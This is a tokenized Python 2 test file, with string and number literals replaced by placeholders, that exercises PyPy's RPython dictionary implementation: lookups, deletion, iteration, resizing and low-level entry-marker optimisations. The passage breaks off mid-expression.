<s> from pypy . translator . translator import TranslationContext <EOL> from pypy . rpython . lltypesystem import lltype , rffi <EOL> from pypy . rpython import rint <EOL> from pypy . rpython . lltypesystem import rdict , rstr <EOL> from pypy . rpython . test . tool import BaseRtypingTest , LLRtypeMixin , OORtypeMixin <EOL> from pypy . rlib . objectmodel import r_dict <EOL> from pypy . rlib . rarithmetic import r_uint , r_longlong , r_ulonglong <EOL> import py <EOL> py . log . setconsumer ( "<STR_LIT>" , py . log . STDOUT ) <EOL> def not_really_random ( ) : <EOL> """<STR_LIT>""" <EOL> import random <EOL> x = random . random ( ) <EOL> print '<STR_LIT>' % ( x , ) <EOL> for i in range ( <NUM_LIT> ) : <EOL> r = <NUM_LIT> + i / <NUM_LIT> <EOL> x = r * x - x * x <EOL> assert <NUM_LIT:0> <= x < <NUM_LIT:4> <EOL> yield x <EOL> class BaseTestRdict ( BaseRtypingTest ) : <EOL> def test_dict_creation ( self ) : <EOL> def createdict ( i ) : <EOL> d = { '<STR_LIT:hello>' : i } <EOL> return d [ '<STR_LIT:hello>' ] <EOL> res = self . interpret ( createdict , [ <NUM_LIT> ] ) <EOL> assert res == <NUM_LIT> <EOL> def test_dict_getitem_setitem ( self ) : <EOL> def func ( i ) : <EOL> d = { '<STR_LIT:hello>' : i } <EOL> d [ '<STR_LIT>' ] = i + <NUM_LIT:1> <EOL> return d [ '<STR_LIT:hello>' ] * d [ '<STR_LIT>' ] <EOL> res = self . interpret ( func , [ <NUM_LIT:6> ] ) <EOL> assert res == <NUM_LIT> <EOL> def test_dict_getitem_keyerror ( self ) : <EOL> def func ( i ) : <EOL> d = { '<STR_LIT:hello>' : i } <EOL> try : <EOL> return d [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> return <NUM_LIT:0> <EOL> res = self . interpret ( func , [ <NUM_LIT:6> ] ) <EOL> assert res == <NUM_LIT:0> <EOL> def test_dict_del_simple ( self ) : <EOL> def func ( i ) : <EOL> d = { '<STR_LIT:hello>' : i } <EOL> d [ '<STR_LIT>' ] = i + <NUM_LIT:1> <EOL> del d [ '<STR_LIT:hello>' ] <EOL> return len ( d ) <EOL> res = self . interpret ( func , [ <NUM_LIT:6> ] ) <EOL> assert res == <NUM_LIT:1> <EOL> def test_dict_clear ( self ) : <EOL> def func ( i ) : <EOL> d = { '<STR_LIT:abc>' : i } <EOL> d [ '<STR_LIT>' ] = i + <NUM_LIT:1> <EOL> d . clear ( ) <EOL> d [ '<STR_LIT>' ] = i + <NUM_LIT:2> <EOL> return ( '<STR_LIT:abc>' not in d and '<STR_LIT>' not in d <EOL> and d [ '<STR_LIT>' ] == i + <NUM_LIT:2> and len ( d ) == <NUM_LIT:1> ) <EOL> res = self . interpret ( func , [ <NUM_LIT:7> ] ) <EOL> assert res == True <EOL> def test_empty_strings ( self ) : <EOL> def func ( i ) : <EOL> d = { '<STR_LIT>' : i } <EOL> del d [ '<STR_LIT>' ] <EOL> try : <EOL> d [ '<STR_LIT>' ] <EOL> return <NUM_LIT:0> <EOL> except KeyError : <EOL> pass <EOL> return <NUM_LIT:1> <EOL> res = self . interpret ( func , [ <NUM_LIT:6> ] ) <EOL> assert res == <NUM_LIT:1> <EOL> def func ( i ) : <EOL> d = { '<STR_LIT>' : i } <EOL> del d [ '<STR_LIT>' ] <EOL> d [ '<STR_LIT>' ] = i + <NUM_LIT:1> <EOL> return len ( d ) <EOL> res = self . interpret ( func , [ <NUM_LIT:6> ] ) <EOL> assert res == <NUM_LIT:1> <EOL> def test_dict_is_true ( self ) : <EOL> def func ( i ) : <EOL> if i : <EOL> d = { } <EOL> else : <EOL> d = { i : i + <NUM_LIT:1> } <EOL> if d : <EOL> return i <EOL> else : <EOL> return i + <NUM_LIT:1> <EOL> assert self . interpret ( func , [ <NUM_LIT> ] ) == <NUM_LIT> <EOL> assert self . interpret ( func , [ <NUM_LIT:0> ] ) == <NUM_LIT:0> <EOL> def test_contains ( self ) : <EOL> def func ( x , y ) : <EOL> d = { x : x + <NUM_LIT:1> } <EOL> return y in d <EOL> assert self . interpret ( func , [ <NUM_LIT> , <NUM_LIT:0> ] ) == False <EOL> assert self . interpret ( func , [ <NUM_LIT> , <NUM_LIT> ] ) == True <EOL> def test_dict_iteration ( self ) : <EOL> def func ( i , j ) : <EOL> d = { } <EOL> d [ '<STR_LIT:hello>' ] = i <EOL> d [ '<STR_LIT>' ] = j <EOL> k = <NUM_LIT:1> <EOL> for key in d : <EOL> k = k * d [ key ] <EOL> return k <EOL> res = self . interpret ( func , [ <NUM_LIT:6> , <NUM_LIT:7> ] ) <EOL> assert res == <NUM_LIT> <EOL> def test_dict_itermethods ( self ) : <EOL> def func ( ) : <EOL> d = { } <EOL> d [ '<STR_LIT:hello>' ] = <NUM_LIT:6> <EOL> d [ '<STR_LIT>' ] = <NUM_LIT:7> <EOL> k1 = k2 = k3 = <NUM_LIT:1> <EOL> for key in d . iterkeys ( ) : <EOL> k1 = k1 * d [ key ] <EOL> for value in d . itervalues ( ) : <EOL> k2 = k2 * value <EOL> for key , value in d . iteritems ( ) : <EOL> assert d [ key ] == value <EOL> k3 = k3 * value <EOL> return k1 + k2 + k3 <EOL> res = self . interpret ( func , [ ] ) <EOL> assert res == <NUM_LIT> + <NUM_LIT> + <NUM_LIT> <EOL> def test_two_dicts_with_different_value_types ( self ) : <EOL> def func ( i ) : <EOL> d1 = { } <EOL> d1 [ '<STR_LIT:hello>' ] = i + <NUM_LIT:1> <EOL> d2 = { } <EOL> d2 [ '<STR_LIT>' ] = d1 <EOL> return d2 [ '<STR_LIT>' ] [ '<STR_LIT:hello>' ] <EOL> res = self . interpret ( func , [ <NUM_LIT:5> ] ) <EOL> assert res == <NUM_LIT:6> <EOL> def test_dict_get ( self ) : <EOL> def func ( ) : <EOL> dic = { } <EOL> x1 = dic . get ( '<STR_LIT>' , <NUM_LIT> ) <EOL> dic [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> x2 = dic . get ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> return x1 * <NUM_LIT:10> + x2 <EOL> res = self . interpret ( func , ( ) ) <EOL> assert res == <NUM_LIT> <EOL> def test_dict_get_empty ( self ) : <EOL> def func ( ) : <EOL> dic = { } <EOL> x1 = dic . get ( '<STR_LIT>' , <NUM_LIT> ) <EOL> x2 = dic . get ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> return x1 * <NUM_LIT:10> + x2 <EOL> res = self . interpret ( func , ( ) ) <EOL> assert res == <NUM_LIT> <EOL> def test_dict_setdefault ( self ) : <EOL> def f ( ) : <EOL> d = { } <EOL> d . setdefault ( '<STR_LIT:a>' , <NUM_LIT:2> ) <EOL> return d [ '<STR_LIT:a>' ] <EOL> res = self . interpret ( f , ( ) ) <EOL> assert res == <NUM_LIT:2> <EOL> def f ( ) : <EOL> d = { } <EOL> d . setdefault ( '<STR_LIT:a>' , <NUM_LIT:2> ) <EOL> x = d . setdefault ( '<STR_LIT:a>' , - <NUM_LIT:3> ) <EOL> return x <EOL> res = self . interpret ( f , ( ) ) <EOL> assert res == <NUM_LIT:2> <EOL> def test_dict_copy ( self ) : <EOL> def func ( ) : <EOL> dic = { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } <EOL> d2 = dic . copy ( ) <EOL> ok = <NUM_LIT:1> <EOL> for key in d2 : <EOL> if dic [ key ] != d2 [ key ] : <EOL> ok = <NUM_LIT:0> <EOL> ok &= len ( dic ) == len ( d2 ) <EOL> d2 [ '<STR_LIT:c>' ] = <NUM_LIT:3> <EOL> ok &= len ( dic ) == len ( d2 ) - <NUM_LIT:1> <EOL> return ok <EOL> res = self . interpret ( func , ( ) ) <EOL> assert res == <NUM_LIT:1> <EOL> def test_dict_update ( self ) : <EOL> def func ( ) : <EOL> dic = { '<STR_LIT>' : <NUM_LIT:1000> , '<STR_LIT:b>' : <NUM_LIT:200> } <EOL> d2 = { '<STR_LIT:b>' : <NUM_LIT:30> , '<STR_LIT>' : <NUM_LIT:4> } <EOL> dic . update ( d2 ) <EOL> ok = len ( dic ) == <NUM_LIT:3> <EOL> sum = ok <EOL> for key in dic : <EOL> sum += dic [ key ] <EOL> return sum <EOL> res = self . interpret ( func , ( ) ) <EOL> assert res == <NUM_LIT> <EOL> def test_dict_keys ( self ) : <EOL> def func ( ) : <EOL> dic = { '<STR_LIT>' : <NUM_LIT:1000> , '<STR_LIT>' : <NUM_LIT:200> } <EOL> keys = dic . keys ( ) <EOL> return ord ( keys [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) + ord ( keys [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) - <NUM_LIT:2> * ord ( '<STR_LIT:0>' ) + len ( keys ) <EOL> res = self . interpret ( func , ( ) ) <EOL> assert res == <NUM_LIT> <EOL> def test_dict_inst_keys ( self ) : <EOL> class Empty : <EOL> pass <EOL> class A ( Empty ) : <EOL> pass <EOL> def func ( ) : <EOL> dic0 = { Empty ( ) : <NUM_LIT:2> } <EOL> dic = { A ( ) : <NUM_LIT:1> , A ( ) : <NUM_LIT:2> } <EOL> keys = dic . keys ( ) <EOL> return ( isinstance ( keys [ <NUM_LIT:1> ] , A ) ) * <NUM_LIT:2> + ( isinstance ( keys [ <NUM_LIT:0> ] , A ) ) <EOL> res = self . interpret ( func , [ ] ) <EOL> assert res == <NUM_LIT:3> <EOL> def test_dict_inst_iterkeys ( self ) : <EOL> class Empty : <EOL> pass <EOL> class A ( Empty ) : <EOL> pass <EOL> def func ( ) : <EOL> dic0 = { Empty ( ) : <NUM_LIT:2> } <EOL> dic = { A ( ) : <NUM_LIT:1> , A ( ) : <NUM_LIT:2> } <EOL> a = <NUM_LIT:0> <EOL> for k in dic . iterkeys ( ) : <EOL> a += isinstance ( k , A ) <EOL> return a <EOL> res = self . interpret ( func , [ ] ) <EOL> assert res == <NUM_LIT:2> <EOL> def test_dict_values ( self ) : <EOL> def func ( ) : <EOL> dic = { '<STR_LIT>' : <NUM_LIT:1000> , '<STR_LIT>' : <NUM_LIT:200> } <EOL> values = dic . values ( ) <EOL> return values [ <NUM_LIT:0> ] + values [ <NUM_LIT:1> ] + len ( values ) <EOL> res = self . interpret ( func , ( ) ) <EOL> assert res == <NUM_LIT> <EOL> def test_dict_inst_values ( self ) : <EOL> class A : <EOL> pass <EOL> def func ( ) : <EOL> dic = { <NUM_LIT:1> : A ( ) , <NUM_LIT:2> : A ( ) } <EOL> vals = dic . values ( ) <EOL> return ( isinstance ( vals [ <NUM_LIT:1> ] , A ) ) * <NUM_LIT:2> + ( isinstance ( vals [ <NUM_LIT:0> ] , A ) ) <EOL> res = self . interpret ( func , [ ] ) <EOL> assert res == <NUM_LIT:3> <EOL> def test_dict_inst_itervalues ( self ) : <EOL> class A : <EOL> pass <EOL> def func ( ) : <EOL> dic = { <NUM_LIT:1> : A ( ) , <NUM_LIT:2> : A ( ) } <EOL> a = <NUM_LIT:0> <EOL> for v in dic . itervalues ( ) : <EOL> a += isinstance ( v , A ) <EOL> return a <EOL> res = self . interpret ( func , [ ] ) <EOL> assert res == <NUM_LIT:2> <EOL> def test_dict_inst_items ( self ) : <EOL> class Empty : <EOL> pass <EOL> class A : <EOL> pass <EOL> class B ( Empty ) : <EOL> pass <EOL> def func ( ) : <EOL> dic0 = { Empty ( ) : <NUM_LIT:2> } <EOL> dic = { B ( ) : A ( ) , B ( ) : A ( ) } <EOL> items = dic . items ( ) <EOL> b = <NUM_LIT:0> <EOL> a = <NUM_LIT:0> <EOL> for k , v in items : <EOL> b += isinstance ( k , B ) <EOL> a += isinstance ( v , A ) <EOL> return <NUM_LIT:3> * b + a <EOL> res = self . interpret ( func , [ ] ) <EOL> assert res == <NUM_LIT:8> <EOL> def test_dict_inst_iteritems ( self ) : <EOL> class Empty : <EOL> pass <EOL> class A : <EOL> pass <EOL> class B ( Empty ) : <EOL> pass <EOL> def func ( ) : <EOL> dic0 = { Empty ( ) : <NUM_LIT:2> } <EOL> dic = { B ( ) : A ( ) , B ( ) : A ( ) } <EOL> b = <NUM_LIT:0> <EOL> a = <NUM_LIT:0> <EOL> for k , v in dic . iteritems ( ) : <EOL> b += isinstance ( k , B ) <EOL> a += isinstance ( v , A ) <EOL> return <NUM_LIT:3> * b + a <EOL> res = self . interpret ( func , [ ] ) <EOL> assert res == <NUM_LIT:8> <EOL> def test_dict_items ( self ) : <EOL> def func ( ) : <EOL> dic = { '<STR_LIT>' : <NUM_LIT:1000> , '<STR_LIT>' : <NUM_LIT:200> } <EOL> items = dic . items ( ) <EOL> res = len ( items ) <EOL> for key , value in items : <EOL> res += ord ( key [ <NUM_LIT:1> ] ) - ord ( '<STR_LIT:0>' ) + value <EOL> return res <EOL> res = self . interpret ( func , ( ) ) <EOL> assert res == <NUM_LIT> <EOL> def test_dict_contains ( self ) : <EOL> def func ( ) : <EOL> dic = { '<STR_LIT>' : <NUM_LIT:1000> , '<STR_LIT>' : <NUM_LIT:200> } <EOL> return '<STR_LIT>' in dic and '<STR_LIT>' not in dic <EOL> res = self . interpret ( func , ( ) ) <EOL> assert res is True <EOL> def test_dict_contains_with_constant_dict ( self ) : <EOL> dic = { '<STR_LIT:4>' : <NUM_LIT:1000> , '<STR_LIT>' : <NUM_LIT:200> } <EOL> def func ( i ) : <EOL> return chr ( i ) in dic <EOL> res = self . interpret ( func , [ ord ( '<STR_LIT:4>' ) ] ) <EOL> assert res is True <EOL> res = self . interpret ( func , [ <NUM_LIT:1> ] ) <EOL> assert res is False <EOL> def test_dict_or_none ( self ) : <EOL> class A : <EOL> pass <EOL> def negate ( d ) : <EOL> return not d <EOL> def func ( n ) : <EOL> a = A ( ) <EOL> a . d = None <EOL> if n > <NUM_LIT:0> : <EOL> a . d = { str ( n ) : <NUM_LIT:1> , "<STR_LIT>" : <NUM_LIT:2> } <EOL> del a . d [ "<STR_LIT>" ] <EOL> return negate ( a . d ) <EOL> res = self . interpret ( func , [ <NUM_LIT:10> ] ) <EOL> assert res is False <EOL> res = self . interpret ( func , [ <NUM_LIT:0> ] ) <EOL> assert res is True <EOL> res = self . interpret ( func , [ <NUM_LIT> ] ) <EOL> assert res is True <EOL> def test_int_dict ( self ) : <EOL> def func ( a , b ) : <EOL> dic = { <NUM_LIT:12> : <NUM_LIT> } <EOL> dic [ a ] = <NUM_LIT:1000> <EOL> return dic . get ( b , - <NUM_LIT> ) <EOL> res = self . interpret ( func , [ <NUM_LIT:12> , <NUM_LIT:12> ] ) <EOL> assert res == <NUM_LIT:1000> <EOL> res = self . interpret ( func , [ <NUM_LIT:12> , <NUM_LIT> ] ) <EOL> assert res == - <NUM_LIT> <EOL> res = self . interpret ( func , [ <NUM_LIT> , <NUM_LIT:12> ] ) <EOL> assert res == <NUM_LIT> <EOL> res = self . interpret ( func , [ <NUM_LIT> , <NUM_LIT> ] ) <EOL> assert res == <NUM_LIT:1000> <EOL> res = self . interpret ( func , [ <NUM_LIT> , <NUM_LIT> ] ) <EOL> assert res == - <NUM_LIT> <EOL> def test_id_instances_keys ( self ) : <EOL> class A : <EOL> pass <EOL> class B ( A ) : <EOL> pass <EOL> def f ( ) : <EOL> a = A ( ) <EOL> b = B ( ) <EOL> d = { } <EOL> d [ b ] = <NUM_LIT:7> <EOL> d [ a ] = <NUM_LIT:3> <EOL> return len ( d ) + d [ a ] + d [ b ] <EOL> res = self . interpret ( f , [ ] ) <EOL> assert res == <NUM_LIT:12> <EOL> def test_captured_get ( self ) : <EOL> get = { <NUM_LIT:1> : <NUM_LIT:2> } . get <EOL> def f ( ) : <EOL> return get ( <NUM_LIT:1> , <NUM_LIT:3> ) + get ( <NUM_LIT:2> , <NUM_LIT:4> ) <EOL> res = self . interpret ( f , [ ] ) <EOL> assert res == <NUM_LIT:6> <EOL> def g ( h ) : <EOL> return h ( <NUM_LIT:1> , <NUM_LIT:3> ) <EOL> def f ( ) : <EOL> return g ( get ) <EOL> res = self . interpret ( f , [ ] ) <EOL> assert res == <NUM_LIT:2> <EOL> def test_specific_obscure_bug ( self ) : <EOL> class A : pass <EOL> class B : pass <EOL> def f ( ) : <EOL> lst = [ A ( ) ] <EOL> res1 = A ( ) in lst <EOL> d2 = { B ( ) : None , B ( ) : None } <EOL> return res1 + len ( d2 ) <EOL> res = self . interpret ( f , [ ] ) <EOL> assert res == <NUM_LIT:2> <EOL> def test_type_erase ( self ) : <EOL> class A ( object ) : <EOL> pass <EOL> class B ( object ) : <EOL> pass <EOL> def f ( ) : <EOL> return { A ( ) : B ( ) } , { B ( ) : A ( ) } <EOL> t = TranslationContext ( ) <EOL> s = t . buildannotator ( ) . build_types ( f , [ ] ) <EOL> rtyper = t . buildrtyper ( ) <EOL> rtyper . specialize ( ) <EOL> s_AB_dic = s . items [ <NUM_LIT:0> ] <EOL> s_BA_dic = s . items [ <NUM_LIT:1> ] <EOL> r_AB_dic = rtyper . getrepr ( s_AB_dic ) <EOL> r_BA_dic = rtyper . getrepr ( s_AB_dic ) <EOL> assert r_AB_dic . lowleveltype == r_BA_dic . lowleveltype <EOL> def test_tuple_dict ( self ) : <EOL> def f ( i ) : <EOL> d = { } <EOL> d [ ( <NUM_LIT:1> , <NUM_LIT> , ( str ( i ) , <NUM_LIT:2> ) , <NUM_LIT:2> ) ] = <NUM_LIT:4> <EOL> d [ ( <NUM_LIT:1> , <NUM_LIT> , ( str ( i ) , <NUM_LIT:2> ) , <NUM_LIT:3> ) ] = <NUM_LIT:6> <EOL> return d [ ( <NUM_LIT:1> , <NUM_LIT> , ( str ( i ) , <NUM_LIT:2> ) , i ) ] <EOL> res = self . interpret ( f , [ <NUM_LIT:2> ] ) <EOL> assert res == f ( <NUM_LIT:2> ) <EOL> def test_dict_of_dict ( self ) : <EOL> def f ( n ) : <EOL> d = { } <EOL> d [ <NUM_LIT:5> ] = d <EOL> d [ <NUM_LIT:6> ] = { } <EOL> return len ( d [ n ] ) <EOL> res = self . interpret ( f , [ <NUM_LIT:5> ] ) <EOL> assert res == <NUM_LIT:2> <EOL> res = self . interpret ( f , [ <NUM_LIT:6> ] ) <EOL> assert res == <NUM_LIT:0> <EOL> def test_access_in_try ( self ) : <EOL> def f ( d ) : <EOL> try : <EOL> return d [ <NUM_LIT:2> ] <EOL> except ZeroDivisionError : <EOL> return <NUM_LIT> <EOL> return - <NUM_LIT:1> <EOL> def g ( n ) : <EOL> d = { <NUM_LIT:1> : n , <NUM_LIT:2> : <NUM_LIT:2> * n } <EOL> return f ( d ) <EOL> res = self . interpret ( g , [ <NUM_LIT:3> ] ) <EOL> assert res == <NUM_LIT:6> <EOL> def test_access_in_try_set ( self ) : <EOL> def f ( d ) : <EOL> try : <EOL> d [ <NUM_LIT:2> ] = <NUM_LIT> <EOL> except ZeroDivisionError : <EOL> return <NUM_LIT> <EOL> return - <NUM_LIT:1> <EOL> def g ( n ) : <EOL> d = { <NUM_LIT:1> : n } <EOL> f ( d ) <EOL> return d [ <NUM_LIT:2> ] <EOL> res = self . interpret ( g , [ <NUM_LIT:3> ] ) <EOL> assert res == <NUM_LIT> <EOL> def test_r_dict ( self ) : <EOL> class FooError ( Exception ) : <EOL> pass <EOL> def myeq ( n , m ) : <EOL> return n == m <EOL> def myhash ( n ) : <EOL> if n < <NUM_LIT:0> : <EOL> raise FooError <EOL> return - n <EOL> def f ( n ) : <EOL> d = r_dict ( myeq , myhash ) <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> d [ i ] = i * i <EOL> try : <EOL> value1 = d [ n ] <EOL> except FooError : <EOL> value1 = <NUM_LIT> <EOL> try : <EOL> value2 = n in d <EOL> except FooError : <EOL> value2 = <NUM_LIT> <EOL> try : <EOL> value3 = d [ - n ] <EOL> except FooError : <EOL> value3 = <NUM_LIT> <EOL> try : <EOL> value4 = ( - n ) in d <EOL> except FooError : <EOL> value4 = <NUM_LIT> <EOL> return ( value1 * <NUM_LIT> + <EOL> value2 * <NUM_LIT> + <EOL> value3 * <NUM_LIT:100> + <EOL> value4 ) <EOL> res = self . interpret ( f , [ <NUM_LIT:5> ] ) <EOL> assert res == <NUM_LIT> <EOL> def test_resize_during_iteration ( self ) : <EOL> def func ( ) : <EOL> d = { <NUM_LIT:5> : <NUM_LIT:1> , <NUM_LIT:6> : <NUM_LIT:2> , <NUM_LIT:7> : <NUM_LIT:3> } <EOL> try : <EOL> for key , value in d . iteritems ( ) : <EOL> d [ key ^ <NUM_LIT:16> ] = value * <NUM_LIT:2> <EOL> except RuntimeError : <EOL> pass <EOL> total = <NUM_LIT:0> <EOL> for key in d : <EOL> total += key <EOL> return total <EOL> res = self . interpret ( func , [ ] ) <EOL> assert <NUM_LIT:5> + <NUM_LIT:6> + <NUM_LIT:7> <= res <= <NUM_LIT:5> + <NUM_LIT:6> + <NUM_LIT:7> + ( <NUM_LIT:5> ^ <NUM_LIT:16> ) + ( <NUM_LIT:6> ^ <NUM_LIT:16> ) + ( <NUM_LIT:7> ^ <NUM_LIT:16> ) <EOL> def test_change_during_iteration ( self ) : <EOL> def func ( ) : <EOL> d = { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } <EOL> for key in d : <EOL> d [ key ] = <NUM_LIT> <EOL> return d [ '<STR_LIT:a>' ] <EOL> assert self . interpret ( func , [ ] ) == <NUM_LIT> <EOL> def test_dict_of_floats ( self ) : <EOL> d = { <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> } <EOL> def fn ( f ) : <EOL> return d [ f ] <EOL> res = self . interpret ( fn , [ <NUM_LIT> ] ) <EOL> assert res == <NUM_LIT> <EOL> def test_dict_of_r_uint ( self ) : <EOL> for r_t in [ r_uint , r_longlong , r_ulonglong ] : <EOL> d = { r_t ( <NUM_LIT:2> ) : <NUM_LIT:3> , r_t ( <NUM_LIT:4> ) : <NUM_LIT:5> } <EOL> def fn ( x , y ) : <EOL> d [ r_t ( x ) ] = <NUM_LIT> <EOL> return d [ r_t ( y ) ] <EOL> res = self . interpret ( fn , [ <NUM_LIT:4> , <NUM_LIT:2> ] ) <EOL> assert res == <NUM_LIT:3> <EOL> res = self . interpret ( fn , [ <NUM_LIT:3> , <NUM_LIT:3> ] ) <EOL> assert res == <NUM_LIT> <EOL> class TestLLtype ( BaseTestRdict , LLRtypeMixin ) : <EOL> def test_dict_but_not_with_char_keys ( self ) : <EOL> def func ( i ) : <EOL> d = { '<STR_LIT:h>' : i } <EOL> try : <EOL> return d [ '<STR_LIT:hello>' ] <EOL> except KeyError : <EOL> return <NUM_LIT:0> <EOL> res = self . interpret ( func , [ <NUM_LIT:6> ] ) <EOL> assert res == <NUM_LIT:0> <EOL> def test_deleted_entry_reusage_with_colliding_hashes ( self ) : <EOL> def lowlevelhash ( value ) : <EOL> p = rstr . mallocstr ( len ( value ) ) <EOL> for i in range ( len ( value ) ) : <EOL> p . chars [ i ] = value [ i ] <EOL> return rstr . LLHelpers . ll_strhash ( p ) <EOL> def func ( c1 , c2 ) : <EOL> c1 = chr ( c1 ) <EOL> c2 = chr ( c2 ) <EOL> d = { } <EOL> d [ c1 ] = <NUM_LIT:1> <EOL> d [ c2 ] = <NUM_LIT:2> <EOL> del d [ c1 ] <EOL> return d [ c2 ] <EOL> char_by_hash = { } <EOL> base = rdict . DICT_INITSIZE <EOL> for y in range ( <NUM_LIT:0> , <NUM_LIT> ) : <EOL> y = chr ( y ) <EOL> y_hash = lowlevelhash ( y ) % base <EOL> char_by_hash . setdefault ( y_hash , [ ] ) . append ( y ) <EOL> x , y = char_by_hash [ <NUM_LIT:0> ] [ : <NUM_LIT:2> ] <EOL> res = self . interpret ( func , [ ord ( x ) , ord ( y ) ] ) <EOL> assert res == <NUM_LIT:2> <EOL> def func2 ( c1 , c2 ) : <EOL> c1 = chr ( c1 ) <EOL> c2 = chr ( c2 ) <EOL> d = { } <EOL> d [ c1 ] = <NUM_LIT:1> <EOL> d [ c2 ] = <NUM_LIT:2> <EOL> del d [ c1 ] <EOL> d [ c1 ] = <NUM_LIT:3> <EOL> return d <EOL> res = self . interpret ( func2 , [ ord ( x ) , ord ( y ) ] ) <EOL> for i in range ( len ( res . entries ) ) : <EOL> assert not ( res . entries . everused ( i ) and not res . entries . valid ( i ) ) <EOL> def func3 ( c0 , c1 , c2 , c3 , c4 , c5 , c6 , c7 ) : <EOL> d = { } <EOL> c0 = chr ( c0 ) ; d [ c0 ] = <NUM_LIT:1> ; del d [ c0 ] <EOL> c1 = chr ( c1 ) ; d [ c1 ] = <NUM_LIT:1> ; del d [ c1 ] <EOL> c2 = chr ( c2 ) ; d [ c2 ] = <NUM_LIT:1> ; del d [ c2 ] <EOL> c3 = chr ( c3 ) ; d [ c3 ] = <NUM_LIT:1> ; del d [ c3 ] <EOL> c4 = chr ( c4 ) ; d [ c4 ] = <NUM_LIT:1> ; del d [ c4 ] <EOL> c5 = chr ( c5 ) ; d [ c5 ] = <NUM_LIT:1> ; del d [ c5 ] <EOL> c6 = chr ( c6 ) ; d [ c6 ] = <NUM_LIT:1> ; del d [ c6 ] <EOL> c7 = chr ( c7 ) ; d [ c7 ] = <NUM_LIT:1> ; del d [ c7 ] <EOL> return d <EOL> if rdict . DICT_INITSIZE != <NUM_LIT:8> : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> res = self . interpret ( func3 , [ ord ( char_by_hash [ i ] [ <NUM_LIT:0> ] ) <EOL> for i in range ( rdict . DICT_INITSIZE ) ] ) <EOL> count_frees = <NUM_LIT:0> <EOL> for i in range ( len ( res . entries ) ) : <EOL> if not res . entries . everused ( i ) : <EOL> count_frees += <NUM_LIT:1> <EOL> assert count_frees >= <NUM_LIT:3> <EOL> def test_dict_resize ( self ) : <EOL> def func ( want_empty ) : <EOL> d = { } <EOL> for i in range ( rdict . DICT_INITSIZE ) : <EOL> d [ chr ( ord ( '<STR_LIT:a>' ) + i ) ] = i <EOL> if want_empty : <EOL> for i in range ( rdict . DICT_INITSIZE ) : <EOL> del d [ chr ( ord ( '<STR_LIT:a>' ) + i ) ] <EOL> return d <EOL> res = self . interpret ( func , [ <NUM_LIT:0> ] ) <EOL> assert len ( res . entries ) > rdict . DICT_INITSIZE <EOL> res = self . interpret ( func , [ <NUM_LIT:1> ] ) <EOL> assert len ( res . entries ) == rdict . DICT_INITSIZE <EOL> def test_dict_valid_resize ( self ) : <EOL> def func ( ) : <EOL> d = { } <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> d [ str ( i ) ] = <NUM_LIT:0> <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> del d [ str ( i ) ] <EOL> res = <NUM_LIT:0> <EOL> self . interpret ( func , [ ] ) <EOL> def test_opt_nullkeymarker ( self ) : <EOL> def f ( ) : <EOL> d = { "<STR_LIT:hello>" : None } <EOL> d [ "<STR_LIT>" ] = None <EOL> return "<STR_LIT:hello>" in d , d <EOL> res = self . interpret ( f , [ ] ) <EOL> assert res . item0 == True <EOL> DICT = lltype . typeOf ( res . item1 ) . TO <EOL> assert not hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> assert not hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> def test_opt_nullvaluemarker ( self ) : <EOL> def f ( n ) : <EOL> d = { - <NUM_LIT:5> : "<STR_LIT>" } <EOL> d [ <NUM_LIT> ] = "<STR_LIT>" <EOL> return len ( d [ n ] ) , d <EOL> res = self . interpret ( f , [ - <NUM_LIT:5> ] ) <EOL> assert res . item0 == <NUM_LIT:4> <EOL> DICT = lltype . typeOf ( res . item1 ) . TO <EOL> assert not hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> assert not hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> def test_opt_nonullmarker ( self ) : <EOL> class A : <EOL> pass <EOL> def f ( n ) : <EOL> if n > <NUM_LIT:5> : <EOL> a = A ( ) <EOL> else : <EOL> a = None <EOL> d = { a : - <NUM_LIT> } <EOL> d [ A ( ) ] = n + <NUM_LIT> <EOL> return d [ a ] , d <EOL> res = self . interpret ( f , [ - <NUM_LIT:5> ] ) <EOL> assert res . item0 == - <NUM_LIT> <EOL> DICT = lltype . typeOf ( res . item1 ) . TO <EOL> assert hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> assert not hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> res = self . interpret ( f , [ <NUM_LIT:6> ] ) <EOL> assert res . item0 == - <NUM_LIT> <EOL> def test_opt_nonnegint_dummy ( self ) : <EOL> def f ( n ) : <EOL> d = { n : <NUM_LIT:12> } <EOL> d [ - <NUM_LIT> ] = <NUM_LIT> <EOL> del d [ n ] <EOL> return len ( d . copy ( ) ) , d [ - <NUM_LIT> ] , d <EOL> res = self . interpret ( f , [ <NUM_LIT:5> ] ) <EOL> assert res . item0 == <NUM_LIT:1> <EOL> assert res . item1 == <NUM_LIT> <EOL> DICT = lltype . typeOf ( res . item2 ) . TO <EOL> assert hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> assert not hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> def test_opt_no_dummy ( self ) : <EOL> def f ( n ) : <EOL> d = { n : <NUM_LIT:12> } <EOL> d [ - <NUM_LIT> ] = - <NUM_LIT> <EOL> del d [ n ] <EOL> return len ( d . copy ( ) ) , d [ - <NUM_LIT> ] , d <EOL> res = self . interpret ( f , [ <NUM_LIT:5> ] ) <EOL> assert res . item0 == <NUM_LIT:1> <EOL> assert res . item1 == - <NUM_LIT> <EOL> DICT = lltype . typeOf ( res . item2 ) . TO <EOL> assert hasattr ( DICT . entries . 